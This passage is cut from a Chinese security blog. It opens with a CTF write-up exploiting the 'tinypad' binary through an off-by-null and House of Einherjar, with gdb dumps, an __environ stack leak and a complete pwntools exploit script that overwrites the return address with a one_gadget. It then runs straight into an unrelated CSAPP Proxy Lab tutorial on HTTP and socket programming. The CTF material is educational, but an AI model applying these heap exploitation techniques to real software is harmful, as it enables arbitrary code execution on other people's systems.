  *(_BYTE *)(a1 + i) = 0;					  // off by one
  if ( i == size && *(_BYTE *)(size - 1 + a1) != 10 )
    dummyinput(xa);                             // 可能有洞
  return i;
}

又是经典的置空末尾“\n”，造成了 off-by-null

有 off-by-null 可以置空下一个chunk的P位
修改模块可以控制 chunk_list 这一大片区域，伪造 fake_size 绰绰有余
最后一个chunk的“presize”直接作为相邻上一个chunk的数据区，完全可以控制

可以考虑打 House Of Einherjar 了：伪造“lastchunk-presize”，溢出“\x00”到“lastchunk->size”

chunk_list_addr=0x602040
chunk2_addr=heap_addr+0xf0
offset=chunk2_addr-chunk_list_addr 
# 和House Of Force不同，House Of Einherjar是利用"合并机制"向上合并topchunk
# 所以offset常常为正('减数'和'被减数'对调)
success('chunk_list_addr >> '+hex(chunk_list_addr))
success('chunk2_addr >> '+hex(chunk2_addr))
success('offset >> '+hex(offset))

add(0xe8, "g"*(0xe8-0x8) + p64(offset)) # 为了申请到chunk1,这里只能申请0xe8
delete(4) # 因为chunk3为free状态，释放chunk4会导致chunk3和chunk4进入topchunk，使chunk2成为“最后一个chunk”(来打House Of Einherjar)

pwndbg> x/20xg 0x1993000
0x1993000:	0x0000000000000000	0x00000000000000f1
0x1993010:	0x6767676767676767	0x6767676767676767
0x1993020:	0x6767676767676767	0x6767676767676767
0x1993030:	0x6767676767676767	0x6767676767676767
0x1993040:	0x6767676767676767	0x6767676767676767
0x1993050:	0x6767676767676767	0x6767676767676767
0x1993060:	0x6767676767676767	0x6767676767676767
0x1993070:	0x6767676767676767	0x6767676767676767
0x1993080:	0x6767676767676767	0x6767676767676767
0x1993090:	0x6767676767676767	0x6767676767676767
0x19930a0:	0x6767676767676767	0x6767676767676767
0x19930b0:	0x6767676767676767	0x6767676767676767
0x19930c0:	0x6767676767676767	0x6767676767676767
0x19930d0:	0x6767676767676767	0x6767676767676767
0x19930e0:	0x6767676767676767	0x6767676767676767
0x19930f0:	0x00000000013910b0	0x0000000000000100 // offset(0x19930f0-0x602040)

伪造 fakechunk -> presizesize，size，FD，BK，FD_next，BK_next ：

payload = p64(0x100) + p64(offset)
payload += p64(chunk_list_addr) * 4 # fakechunk为largechunk,会启用FDsize,BKsize
edit(2, payload)
delete(2)

pwndbg> x/20xg 0x602040
0x602040 <tinypad>:	0x0000000000000100	0x0000000000c710b0
0x602050 <tinypad+16>:	0x0000000000602040	0x0000000000602040
0x602060 <tinypad+32>:	0x0000000000602040	0x0000000000602040
0x602070 <tinypad+48>:	0x4242424242424200	0x4242424242424242
0x602080 <tinypad+64>:	0x4242424242424242	0x4242424242424242

下一个 chunk 就会申请到“0x602040”，以后的区域都是可以控制的，刚好可以控制 chunk1（即使不能控制 chunk1 也可以多次申请，直到控制 chunkn 为止）

接下来有两种主流打法：

劫持 GOT
劫持 hook

因为程序开了 Full RELRO ，GOT不可写，所以不能GOT劫持

我当时打 hook 的时候发现“修改模块”始终复制不上字符串，最后发现原因了：

1 2	len_data = strlen((const char )&chunk_list[16 index + 248]); read_until((__int64)chunk_list, len_data, 0xAu);

“chunk_list[16 * index + 248]” 中是真实存在数据的，所以 len_data 有值

但是把这里覆盖为 hook_free 后，len_data 就变为“0”了，导致 read_until 读不了数据

遇到这个问题，网上有两种解决办法：

通过全局变量__environ 泄露栈地址，把 one_get 复制到返回地址上
在 malloc_hook 前面寻找有数据的地址，利用它们来欺骗 strlen

这里采用第一种方法（第二种方法还没有研究明白）

在 libc 中有一个全局变量__environ，储存着该程序环境变量的地址，而环境变量是储存在栈上的，所以可以泄露栈地址，所以可以控制rip了

payload = p64(0xe8) + p64(libc_base + libc.symbols["__environ"])
payload += p64(0xe8) + p64(0x602148)
add(0xe0, "t"*0xe0)
add(0x100, payload)

p.readuntil("# CONTENT: ")
stack = p.read(6).ljust(8,'\x00')
stack_env = u64(stack)
success("env_stack address: " + hex(stack_env))

1	[+] env_stack address: 0x7ffe177c5a98

在 GDB 中查看 main 的返回地址：

pwndbg> stack 50
00:0000│ rsp   0x7ffe177c58b8 —▸ 0x400ed9 (_read_n+112) ◂— mov    qword ptr [rbp - 0x10], rax
01:0008│       0x7ffe177c58c0 ◂— 0x4
02:0010│       0x7ffe177c58c8 ◂— 0x1
03:0018│       0x7ffe177c58d0 —▸ 0x7ffe177c5964 ◂— 0x338cf40000000000
04:0020│       0x7ffe177c58d8 —▸ 0x400fad (_write_n+112) ◂— mov    qword ptr [rbp - 0x10], rax
05:0028│       0x7ffe177c58e0 —▸ 0x401a29 ◂— or     al, byte ptr [rax] /* '\n' */
06:0030│       0x7ffe177c58e8 ◂— 0x0
07:0038│       0x7ffe177c58f0 —▸ 0x4018d8 (prompt_cmd) ◂— sub    byte ptr [rbx + 0x4d], al /* '(CMD)>>> ' */
08:0040│       0x7ffe177c58f8 ◂— 0x2695b83a338cf400
09:0048│ rbp   0x7ffe177c5900 —▸ 0x7ffe177c5950 —▸ 0x7ffe177c5970 —▸ 0x7ffe177c59a0 —▸ 0x401370 (__libc_csu_init) ◂— ...
0a:0050│       0x7ffe177c5908 —▸ 0x401100 (read_until+73) ◂— mov    qword ptr [rbp - 0x10], rax
0b:0058│       0x7ffe177c5910 ◂— 9 /* '\t' */
0c:0060│       0x7ffe177c5918 ◂— 0xa338cf400
0d:0068│       0x7ffe177c5920 ◂— 0x1
0e:0070│       0x7ffe177c5928 —▸ 0x7ffe177c5964 ◂— 0x338cf40000000000
0f:0078│       0x7ffe177c5930 ◂— 9 /* '\t' */
10:0080│       0x7ffe177c5938 ◂— 0x0
11:0088│       0x7ffe177c5940 —▸ 0x7ffe177c5970 —▸ 0x7ffe177c59a0 —▸ 0x401370 (__libc_csu_init) ◂— push   r15
12:0090│       0x7ffe177c5948 ◂— 0x2695b83a338cf400
13:0098│       0x7ffe177c5950 —▸ 0x7ffe177c5970 —▸ 0x7ffe177c59a0 —▸ 0x401370 (__libc_csu_init) ◂— push   r15
14:00a0│       0x7ffe177c5958 —▸ 0x400832 (getcmd+92) ◂— mov    esi, 1
15:00a8│ rsi-4 0x7ffe177c5960 ◂— 0x2
16:00b0│       0x7ffe177c5968 ◂— 0x2695b83a338cf400
17:00b8│       0x7ffe177c5970 —▸ 0x7ffe177c59a0 —▸ 0x401370 (__libc_csu_init) ◂— push   r15
18:00c0│       0x7ffe177c5978 —▸ 0x4009c1 (main+350) ◂— mov    dword ptr [rbp - 0x10], eax
19:00c8│       0x7ffe177c5980 ◂— 0x3400401370
1a:00d0│       0x7ffe177c5988 ◂— 0x4
1b:00d8│       0x7ffe177c5990 ◂— 0x10000000041 /* 'A' */
1c:00e0│       0x7ffe177c5998 ◂— 0x2695b83a338cf400
1d:00e8│       0x7ffe177c59a0 —▸ 0x401370 (__libc_csu_init) ◂— push   r15
1e:00f0│       0x7ffe177c59a8 —▸ 0x7f6d91c1c840 (__libc_start_main+240) ◂— mov    edi, eax // target
1f:00f8│       0x7ffe177c59b0 ◂— 0x1

计算偏移：

1 2	In [6]: 0x7ffe177c59a8-0x7ffe177c5a98 Out[6]: -240

完整exp：

from pwn import*

p=process('./tinypad')
elf=ELF('./tinypad')
libc = ELF('./libc-2.23.so')

def add(size,content):
	p.recvuntil('(CMD)>>> ')
	p.sendline('a')
	p.recvuntil('(SIZE)>>> ')
	p.sendline(str(size))
	p.recvuntil('(CONTENT)>>> ')
	p.sendline(content)

def delete(index):
	p.recvuntil('(CMD)>>> ')
	p.sendline('d')
	p.recvuntil('(INDEX)>>> ')
	p.sendline(str(index))

def edit(index,content):
	p.recvuntil('(CMD)>>> ')
	p.sendline('e')
	p.recvuntil('(INDEX)>>> ')
	p.sendline(str(index))
	p.recvuntil('CONTENT: ')
	p.recvuntil('(CONTENT)>>> ')
	p.sendline(content)
	p.recvuntil('(Y/n)>>> ')
	p.sendline('y')

add(0xe0, "A"*0xe0)
add(0xf0, "B"*0xf0)
add(0x100, "C"*0x100)
add(0x100, "D"*0x100)
delete(3)
delete(1)

p.recvuntil('NDEX: 1\n')
p.recvuntil('# CONTENT: ')
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
heap_addr=leak_addr-0x1f0

p.recvuntil('NDEX: 3\n')
p.recvuntil('# CONTENT: ')
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('heap_addr >> '+hex(heap_addr))
success('libc_base >> '+hex(libc_base))

chunk_list_addr=0x602040
chunk2_addr=heap_addr+0xf0
offset=chunk2_addr-chunk_list_addr
success('chunk_list_addr >> '+hex(chunk_list_addr))
success('chunk2_addr >> '+hex(chunk2_addr))
success('offset >> '+hex(offset))

add(0xe8, "g"*(0xe8-0x8) + p64(offset))
delete(4)

payload = p64(0x100) + p64(offset)
payload += p64(chunk_list_addr)*4
edit(2, payload)
delete(2)

gadget = [0x45226,0x4527a,0xf03a4,0xf1247]
gadget_addr = libc_base + gadget[3]
malloc_hook = libc_base + libc.sym['__malloc_hook']
success('malloc_hook >> '+hex(malloc_hook))

payload = p64(0xe8) + p64(libc_base + libc.symbols["__environ"])
payload += p64(0xe8) + p64(0x602148)
add(0xe0, "t"*0xe0)
add(0x100, payload)

p.readuntil("# CONTENT: ")
stack = p.read(6).ljust(8,'\x00')
stack_env = u64(stack)
success("env_stack address: " + hex(stack_env))
pause()
edit(2, p64(stack_env-240))
edit(1, p64(gadget_addr))
p.readuntil("(CMD)>>>")
p.sendline("Q")

p.interactive()

house of einherjar 小结（2.23-64位）

house of Einherjar 的核心在于 top chunk 合并，如果一个程序有 off-by-null，并且某片区域可以控制，那么就可以通过 house of einherjar 把 top chunk 合并到那里去

特点归纳如下：

需要 off-by-one 漏洞（用于覆盖 last chunk->size 的P位为“0”）
需要一片可以控制的区域（用于伪造“fake chunk->presize，size，FD，BK，FDsize，BKsize”）

在决定打 house of einherjar 后，要多注意最后一个chunk，和倒数第二个chunk，有时可以通过释放后面的chunk，来把我们“布置”好的chunk变为 last chunk

对于本题目而言，libc-2.27版本是打不通的，因为绕 cache 需要释放7个chunk来填满 cache，但是本题目只允许同时存在 4 个chunk，所以测试不了 libc-2.27版本对 house of einherjar 的影响了

另外我还学到了一种泄露栈地址的技术：Environ Leak

CSapp-Proxy Lab

Posted on 2022-03-06 Edited on 2022-10-10 In Knowledge 52k 47 mins.

Proxy Lab

网络代理是一个在网络浏览器和终端服务器之间充当中间人的程序，而不是直接联系终端服务器以获取网页，浏览器会联系代理，代理会转发请求发送到终端服务器

当终端服务器回复代理时，代理将回复发送到浏览器

代理有很多用途：

有时在防火墙中使用代理，因此防火墙只能通过代理与防火墙之外的服务器联系
代理也可以充当匿名者：通过剥离所有标识信息的请求
代理可以使浏览器对Web匿名服务器
代理甚至可以通过存储来自服务器的对象的本地副本来缓存web对象，通过从缓存中读取请求来响应未来的请求，而不是通过再次与远程服务器

在本实验室中，您将编写一个简单的HTTP代理来缓存web对象，在实验室的第一部分，你将设置代理以接受传入连接、读取和分析请求、将请求转发到web服务器、读取服务器的响应，并将这些响应转发给相应的客户端

第一部分：您将学习基本的HTTP操作，以及如何使用套接字编写通信程序通过网络连接

第二部分：您将升级代理以处理多个并发事件连接，这将向您介绍如何处理并发性，这是一个至关重要的系统概念

第三部分：您将使用一个简单的最近访问的内存缓存向代理添加缓存网络内容

实验文件

proxy.c：启动代理服务器的代码写在此处
tiny：Tiny web服务器的源代码
driver.sh：打分文件

在开始实验前，需要一些储备知识：

服务器简析

每个网络应用都是基于客户端—服务器模型的，釆用这个模型，一个应用是由 一个服务器进程 和一个或者多个 客户端 进程组成

个客户端—服务器事务由以下四步组成：

当一个客户端需要服务时，它向服务器发送一个请求，发起一个事务，例如，当 Web 浏览器需要一个文件时，它就发送一个请求给 Web 服务器
服务器收到请求后，解释它，并以适当的方式操作它的资源，例如，当 Web 服务器收到浏览器发出的请求后，它就读一个磁盘文
服务器给客户端发送一个响应，并等待下一个请求，例如，Web 服务器将文件发送回客户端
客户端收到响应并处理它，例如，当 Web 浏览器收到来自服务器的一页后，就在屏幕上显示此页

服务器请求

一般的请求消息如下代码所示：

GET /home.html HTTP/1.0 <!-- 请求消息行 -->
Accept: */* <!-- 请求消息头 -->
Host: localhost:GET /home.html HTTP/1.0
Accept: */*
Host: localhost:GET /home.html HTTP/1.0
Accept: */*
Host: localhost:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3
Connection: close
Proxy-Connection: close
    
<html> <!-- 消息正文 -->
<head><title>test</title></head>
<body> 
<img align="middle" src="godzilla.gif">
Dave O'Hallaron
</body>
</html>

请求消息行：请求消息的第一行为请求消息行
- 例如：GET /test/test.html HTTP/1.1
- GET 为请求方式，请求方式分为：Get（默认）、POST、DELETE、HEAD等
  - GET：明文传输不安全，数据量有限，不超过1kb
  - POST：暗文传输，安全，数据量没有限制
- /test/test.html 为URI，统一资源标识符
- HTTP/1.1 为协议版本
请求消息头：从第二行开始到空白行统称为请求消息头
- Accept：浏览器可接受的MIME类型告诉服务器客户端能接收什么样类型的文件
- Accept-Charset：浏览器通过这个头告诉服务器，它支持哪种字符集
- Accept-Encoding：浏览器能够进行解码的数据编码方式，比如 gzip
- Accept-Language：浏览器所希望的语言种类，当服务器能够提供一种以上的语言版本时要用到，可以在浏览器中进行设置
- Host：初始URL中的主机和端口
- Referrer：包含一个URL，用户从该URL代表的页面出发访问当前请求的页面
- Content-Type：内容类型告诉服务器浏览器传输数据的MIME类型，文件传输的类型
- If-Modified-Since：利用这个头与服务器的文件进行比对，如果一致，则从缓存中直接读取文件
- User-Agent：浏览器类型
- Content-Length：表示请求消息正文的长度
- Connection：表示是否需要持久连接。如果服务器看到这里的值为“Keep -Alive”，或者看到请求使用的是HTTP 1.1（HTTP 1.1默认进行持久连接）
- Cookie：用于分辨两个请求是否来自同一个浏览器，以及保存一些状态信息
- Date：请求时间GMT
消息正文：当请求方式是[POST]方式时，才能看见消息正文，消息正文就是要传输的一些数据，如果没有数据需要传输时，消息正文为空

服务器响应

一般的请求消息如下代码所示：

HTTP/1.0 200 OK <!-- 响应消息行 -->
Server: Tiny Web Server <!-- 响应消息头 -->
Content-length: 120
Content-type: text/html

<html> <!-- 响应正文 -->
<head><title>test</title></head>
<body> 
<img align="middle" src="godzilla.gif">
Dave O'Hallaron
</body>
</html>

响应消息行：第一行响应消息为响应消息行
- 例如：HTTP/1.0 200 OK
- HTTP/1.0 为协议版本
- 200 为响应状态码，常用的响应状态码有40余种，这里我们仅列出几种，详细请看：
  - 200：一切正常
  - 302/307：临时重定向
  - 304：未修改，客户端可以从缓存中读取数据，无需从服务器读取
  - 404：服务器上不存在客户端所请求的资源
  - 500：服务器内部错误
- OK 为状态码描述
响应消息头：
- Location：指示新的资源的位置通常和302/307一起使用，完成请求重定向
- Server：指示服务器的类型
- Content-Encoding：服务器发送的数据采用的编码类型
- Content-Length：告诉浏览器正文的长度
- Content-Language：服务发送的文本的语言
- Content-Type：服务器发送的内容的MIME类型
- Last-Modified：文件的最后修改时间
- Refresh：指示客户端刷新频率，单位是秒
- Content-Disposition：指示客户端下载文件
- Set-Cookie：服务器端发送的Cookie
- Expires：-1
- Cache-Control：no-cache (1.1)
- Pragma：no-cache (1.0) 表示告诉客户端不要使用缓存
- Connection：close/Keep-Alive
- Date：请求时间
响应正文：即网页的源代码（F12可查看）

网络编程结构体

通用结构体：struct sockaddr，16个字节

/* Generic socket address structure (for connect, bind, and accept) */
struct sockaddr {
    uint16_t   sa_family;      /* Protocol family */
    char       sa_data[14];    /* Address data */
};

struct sockaddr 是一个通用地址结构，这是为了统一地址结构的表示方法，统一接口函数，使不同的地址结构可以被bind() , connect() 等函数调用

sockaddr的缺陷：sa_data 把目标地址和端口信息混在一起了

通用结构体：struct sockaddr_storage，128个字节

/* Structure large enough to hold any socket address 
  (with the historical exception of AF_UNIX). 128 bytes reserved.  */
  
#if ULONG_MAX > 0xffffffff
# define __ss_aligntype __uint64_t
#else
# define __ss_aligntype __uint32_t
#endif
#define _SS_SIZE        128
#define _SS_PADSIZE     (_SS_SIZE - (2 * sizeof (__ss_aligntype)))
 
 struct sockaddr_storage
 {
     uint16_t          ss_family;     /* Address family */
     __ss_aligntype   __ss_align;     /* Force desired alignment.  */
     char __ss_padding[_SS_PADSIZE];
};

struct sockaddr_storage 被设计为同时适合 struct sockaddr_in 和 struct sockaddr_in6

为了避免试图知道要使用的IP版本，可以使用 struct sockaddr_storage，该版本可以保存其中任何一个，后将通过 connect()，bind() 等函数将其类型转换为 struct sockaddr 并以这种方式进行访问

IPv4：struct sockaddr_in，16个字节

/* IP socket address structure */
struct sockaddr_in {
    uint16_t       sin_family;   /* Protocol family (always AF_INET) */
    uint16_t       sin_port;     /* 16位的端口号 */
    struct in_addr sin_addr;     /* 32位的IP地址 */
    unsigned char sin_zero[sizeof (struct sockaddr) -
                           sizeof (sa_family_t) -
                           sizeof (in_port_t) -
                           sizeof (struct in_addr)]; // sin_zero[8]
    /* Pad to sizeof(struct sockaddr) */
};

typedef uint32_t in_addr_t;
struct in_addr  {
     in_addr_t   s_addr;            /* IPv4 address */
};

该结构体解决了 sockaddr 的缺陷，把 port 和 addr 分开储存在两个变量中

IPv6：struct sockaddr_in6，28个字节

struct sockaddr_in6 {
    uint16_t    sin6_family;      /* AF_INET6 */
    uint16_t    sin6_port;        /* Transport layer port # */
    uint32_t    sin6_flowinfo;    /* IPv6 flow information */
    struct in6_addr sin6_addr;    /* IPv6 address */
    uint32_t sin6_scope_id;       /* IPv6 scope-id */
};
struct in6_addr {
    union {
        uint8_t u6_addr8[16];
        uint16_t u6_addr16[8];
        uint32_t u6_addr32[4];
    } in6_u;

    #define s6_addr                 in6_u.u6_addr8
    #define s6_addr16               in6_u.u6_addr16
    #define s6_addr32               in6_u.u6_addr32
};

网络编程中的信号

进程组

进程组就是一系列相互关联的进程集合，系统中的每一个进程也必须从属于某一个进程组，每个进程组中都会有一个唯一的 ID(process group id)，简称 PGID，PGID 一般等同于进程组的创建进程的 Process ID，而这个进进程一般也会被称为进程组先导(process group leader)，同一进程组中除了进程组先导外的其他进程都是其子进程

进程组的存在，方便了系统对多个相关进程执行某些统一的操作，例如：我们可以一次性发送一个信号量给同一进程组中的所有进程

会话

会话（session）是一个若干进程组的集合，同样的，系统中每一个进程组也都必须从属于某一个会话

一个会话只拥有最多一个控制终端（也可以没有），该终端为会话中所有进程组中的进程所共用
一个会话中前台进程组只会有一个，只有其中的进程才可以和控制终端进行交互，除了前台进程组外的进程组，都是后台进程组

和进程组先导类似，会话中也有会话先导(session leader)的概念，用来表示建立起到控制终端连接的进程，在拥有控制终端的会话中，session leader 也被称为控制进程(controlling process)，一般来说控制进程也就是登入系统的 shell 进程(login shell)

带外数据

带外数据用于迅速告知对方本端发生的重要的事件，它比普通的数据（带内数据）拥有更高的优先级， 不论发送缓冲区中是否有排队等待发送的数据，它总是被立即发送 ，带外数据的传输可以使用一条独立的传输层连接，也可以映射到传输普通数据的连接中，

// 实际应用中，带外数据是使用很少见，有 telnet 和 ftp 等远程非活跃程序

UDP没有没有实现带外数据传输，TCP也没有真正的带外数据，不过TCP利用头部的紧急指针标志和紧急指针，为应用程序提供了一种紧急方式，含义和带外数据类似，TCP的紧急方式利用传输普通数据的连接来传输紧急数据

SIGHUP信号（关闭进程）

SIGHUP 信号在 用户终端连接(正常或非正常)结束 时发出, 通常是在终端的控制进程结束时, 通知同一session内的各个作业(任务)，这时它们与控制终端不再关联

系统对SIGHUP信号的默认处理是：终止收到该信号的进程 ，所以若程序中没有捕捉该信号，当收到该信号时，进程就会退出

SIGHUP会在以下3种情况下被发送给相应的进程：

终端关闭时，该信号被发送到 session 首进程以及作为 job 提交的进程（即用 & 符号提交的进程）
session 首进程退出时，该信号被发送到该 session 中的前台进程组中的每一个进程
若父进程退出导致进程组成为孤儿进程组，且该进程组中有进程处于停止状态（收到SIGSTOP或SIGTSTP信号），该信号会被发送到该进程组中的每一个进程

例如：在我们登录Linux时，系统会分配给登录用户一个终端(Session)，在这个终端运行的所有程序，包括前台进程组和后台进程组，一般都属于这个 Session，当用户退出Linux登录时，前台进程组和后台有对终端输出的进程将会收到SIGHUP信号，这个信号的默认操作为终止进程，因此前台进程组和后台有终端输出的进程就会中止

// 晦涩难懂，需要在实例中理解分析

SIGPIPE信号（告知中断）

当 往一个写端关闭的管道或 socket 连接中连续写入数据时会引发 SIGPIPE 信号（引发 SIGPIPE 信号的写操作将设置 errno 为EPIPE）

在TCP通信中，当通信的双方中的一方close一个连接时，若另一方接着发数据，根据TCP协议的规定，会收到一个RST(Reset the connection)响应报文，若再往这个服务器发送数据时，系统会发出一个SIGPIPE信号给进程，告诉进程这个连接已经断开了，不能再写入数据

即使断开还可以进行一次通信，第二次发送数据时才触发SIGPIPE
可以用相应的 handle 进行处理SIGPIPE，完成想要的操作

服务器代码：

void handle(int sig) // 处理程序
{
    printf("SIGPIPE : %d\n",sig);
}

void mysendmsg(int fd)
{

    // 写入第一条消息
    char* msg1 = "first msg"; 
    int n = write(fd, msg1, strlen(msg1));

    if(n > 0)  //成功写入第一条消息,server接收到client发送的RST
    {
        printf("success write %d bytes\n", n);
    }

    // 写入第二条消息,触发SIGPIPE
    char* msg2 = "second msg";
    n = write(fd, msg2, strlen(msg2));
    if(n < 0)
    {
        printf("write error: %s\n", strerror(errno));
    }
}
int main()
{
    signal(SIGPIPE , handle); //注册信号捕捉函数

    struct sockaddr_in server_addr;

    bzero(&server_addr, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    server_addr.sin_port = htons(port);

    int listenfd = socket(AF_INET , SOCK_STREAM , 0);

    bind(listenfd, (struct sockaddr *)&server_addr, sizeof(server_addr));
    /* 把一个本地协议地址赋予一个套接字'listenfd' */

    listen(listenfd, 128);
    /* 让'listenfd'变为被动监听状态 */

    int fd = accept(listenfd, NULL, NULL);
    /* 等待来自客户端的连接请求到达侦听描述符listenfd，返回一个已连接描述符 */
    if(fd < 0)
    {
        perror("accept");
        exit(1);
    }

    mysendmsg(fd);

    return 0;
}

客户端代码：

int main()
{
    char buf[MAX] = {'0'};
    int sockfd;
    int n;
    socklen_t slen;
    slen = sizeof(struct sockaddr);
    struct sockaddr_in seraddr;

    bzero(&seraddr,sizeof(seraddr));
    seraddr.sin_family = AF_INET;
    seraddr.sin_port = htons(PORT);
    seraddr.sin_addr.s_addr = htonl(INADDR_ANY);

    //socket()
    if((sockfd = socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("socket");
        exit(-1);
    }
    //connect()
    if(connect(sockfd,(struct sockaddr *)&seraddr,slen) == -1)
    {
        /* 试图与“套接字地址为seraddr的服务器”建立一个因特网连接 */
        perror("connect");
        exit(-1);
    }

    int ret = shutdown(sockfd , SHUT_RDWR);
    /* 禁止在sockfd上进行数据的接收与发送(关闭sockfd的读写功能) */
    if(ret < 0)
    {
        perror("shutdown perror");
    }
    
    return 0;
}

结果：

依次触发：write_msg1，handle，write_msg2

此外，因为SIGPIPE信号的默认行为是结束进程，而我们绝对不希望因为写操作的错误而导致程序退出，尤其是作为服务器程序来说就更恶劣了。所以我们应该对这种信号加以处理，在这里，介绍两种处理SIGPIPE信号的方式：

给SIGPIPE设置SIG_IGN信号处理函数，忽略该信号：

1	signal(SIGPIPE, SIG_IGN);

前文说过，引发SIGPIPE信号的写操作将设置errno为EPIPE，所以，第二次往关闭的socket中写入数据时，会返回-1，同时errno置为EPIPE，这样，便能知道对端已经关闭，然后进行相应处理，而不会导致整个进程退出

使用send函数的MSG_NOSIGNAL标志来禁止写操作触发SIGPIPE信号：

1	send(sockfd , buf , size , MSG_NOSIGNAL);

同样，我们可以根据send函数反馈的errno来判断socket的读端是否已经关闭

此外，我们也可以通过IO复用函数来检测管道和socket连接的读端是否已经关闭，以POLL为例，当socket连接被对方关闭时，socket上的POLLRDHUP事件将被触发

SIGURG信号

内核通知应用程序带外数据到达的方式有两种：

一种就是利用ＩＯ复用技术的系统调用（如select）在接受到带外数据时将返回，并向应用程序报告socket上的异常事件
另一种方法就是使用SIGURG信号

参考：网络编程的三个重要信号

套接字接口

套接字接口（socket interface）是一组函数，它们和 Unix I/O 函数结合起来，用以创建网络应用

大多数现代系统上都实现套接字接口，包括所有的 Unix 变种、Windows 和 Macintosh 系统

// 从 Linux 内核的角度来看，一个套接字就是 通信的一个端点 ，从 Linux 程序的角度来看，套接字就是一个 有相应描述符的打开文件

因特网的套接字地址存放在所示的类型为 sockaddr_in 的 16 字节结构中（IP 地址和端口号总是以网络字节顺序（大端法）存放的）

下面将介绍套接字接口中的部分函数：

int socket(int domain, int type, int protocol);
// domain：即协议域，又称为协议族（family）
// type：指定socket类型
// protocol：指定协议

// 协议族决定了 socket 的地址类型，在通信中必须采用对应的地址

socket 函数 用于来返回一个 套接字描述符 （clientfd）

套接字描述符：用来标定系统为当前的进程划分的一块缓冲空间，类似于文件描述符
文件描述符：是内核为了高效管理已被打开的文件所创建的索引，用于指代被打开的文件，对文件所有 I/O 操作相关的系统调用都需要通过文件描述符（open的返回值fd）

int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
// sockfd：需要绑定的socket
// *addr：存放了服务端用于通信的地址和端口
// addrlen: sizeof(sockaddr_in)

bind 函数 告诉内核将 addr 中的服务器套接字地址和套接字描述符 sockfd 联系起来

// bind函数把一个本地协议地址赋予一个套接字

1
2
3

int connect(int clientfd, const struct sockaddr *addr, socklen_t addrlen);
// clientfd：套接字描述符的一种
// addrlen：sizeof(sockaddr_in)

connect 函数 试图与 “套接字地址为 addr 的服务器” 建立一个因特网连接

如果成功，clientfd 描述符现在就准备好可以读写了(最好用 getaddrinfo 来为 connect 提供参数)

1
2
3

int listen(int sockfd, int backlog);
// sockfd：需要绑定的socket
// backlog：暗示了内核在开始拒绝连接请求之前，队列中要排队的未完成的连接请求的数量

listen 函数 将 sockfd 从一个 主动套接字 转化为一个 监听套接字 （listening socket），该套接字可以接受来自客户端的连接请求

int accept(int listenfd, struct sockaddr *addr, int *addrlen);
// listenfd：服务器的socket描述符
// *addr：指向struct sockaddr *的指针
// *addrlen：协议地址的长度

accept 函数 等待来自客户端的连接请求到达侦听描述符 listenfd，然后在 addr 中填写客户端的套接字地址，并返回一个 已连接描述符

一个服务器通常通常仅仅只创建一个监听socket描述字，内核为每个由服务器进程接受的客户连接创建了一个已连接socket描述字，当服务器完成了对某个客户的服务，相应的已连接socket描述字就被关闭

int getaddrinfo(const char *host, const char *service,
                const struct addrinfo *hints,
                struct addrinfo **result);
// host & service：套接字地址的两个组成部分
// 可选的参数 hints 是一个 addrinfo 结构，它提供对 getaddrinfo 返回的套接字地址列表的更好的控制
// getaddrinfo 返回 result，result 一个指向 addrinfo 结构的链表

void freeaddrinfo(struct addrinfo *result);
const char *gai_strerror(int errcode); // 返回：错误消息

getaddrinfo 函数 将主机名、主机地址、服务名和端口号的字符串表示转化成套接字地址结构，它是已弃用的 gethostbyname 和 getservbyname 函数的新的替代品

在客户端调用了 getaddrinfo 之后，会遍历这个列表，依次尝试每个套接字地址，直到调用 socket 和 connect 成功，建立起连接，类似地，服务器会尝试遍历列表中的每个套接字地址，直到调用 socket 和 bind 成功，描述符会被绑定到一个合法的套接字地址，

为了避免内存泄漏，应用程序必须在最后调用 freeaddrinfo，释放该链表
如果 getaddrinfo 返回非零的错误代码，应用程序可以调用 gai_streeror，将该代码转换成消息字符串

struct addrinfo {
    int             ai_flags;      /* Hints argument flags */
    int             ai_family;     /* First arg to socket function */
    int             ai_socktype;   /* Second arg to socket function */
    int             ai_protocol;   /* Third arg to socket function */
    char            *ai_canonname; /* Canonical hostname */
    size_t          ai_addrlen;    /* Size of ai_addr struct */
    struct sockaddr *ai_addr;      /* Ptr to socket address structure */
    struct addrinfo *ai_next;      /* Ptr to next item in linked list */
};

int getnameinfo(const struct sockaddr *sa, socklen_t salen,
                char *host, size_t hostlen,
                char *service, size_t servlen, int flags);
// *sa：指向大小为 salen 字节的套接字地址结构
// *host 指向大小为 hostlen 字节的缓冲区
// *service 指向大小为 servlen 字节的缓冲区
// 参数 flags 是一个位掩码，能够修改默认的行为

getnameinfo 函数 和 getaddrinfo 是相反的，将一个套接字地址结构转换成相应的主机和服务名字符串，它是已弃用的 gethostbyaddr 和 getservbyport 函数的新的替代品

1
2
3

int open_clientfd(char *hostname, char *port);
// *hostname：服务器运行的地址
// *port：指向端口

客户端调用 open_clientfd 建立与服务器的连接

open_clientfd 函数 建立与服务器的连接，该服务器运行在主机 hostname 上，并在端口号 port 上监听连接请求

1 2	int open_listenfd(char port); // port：指向端口号

open_listenfd 函数 打开和返回一个监听描述符，这个描述符准备好在端口 port_h 接收连接请求

echo 客户端案例：

#include "csapp.h"

int main(int argc, char **argv)
{
    int clientfd;
    char *host, *port, buf[MAXLINE];
    rio_t rio;

    if (argc != 3) {
        fprintf(stderr, "usage: %s <host> <port>\n", argv[0]);
        exit(0);
    }
    host = argv[1];
    port = argv[2];

    clientfd = Open_clientfd(host, port);
    /* 建立与服务器的连接，该服务器运行在主机hostname上，在端口号port上监听连接请求 */
    Rio_readinitb(&rio, clientfd);
    /* 将"描述符clientfd"和"地址在rio处的一个的读缓冲区"联系起来 */

    while (Fgets(buf, MAXLINE, stdin) != NULL) {
        /* 从标准输入中读取数据到buf */
        Rio_writen(clientfd, buf, strlen(buf));
        /* 从位置buf传送strlen(buf)个字节到描述符clientfd */
        Rio_readlineb(&rio, buf, MAXLINE);
        /* 从&rio读出下一个文本行（包括结尾的换行符，数最多maxlen-1个字节），将它复制到内存位置buf，并且用NULL字符来结束这个文本行 */
        Fputs(buf, stdout);
        /* 从"标准输出"输出buf */
    }
    Close(clientfd);
    exit(0);
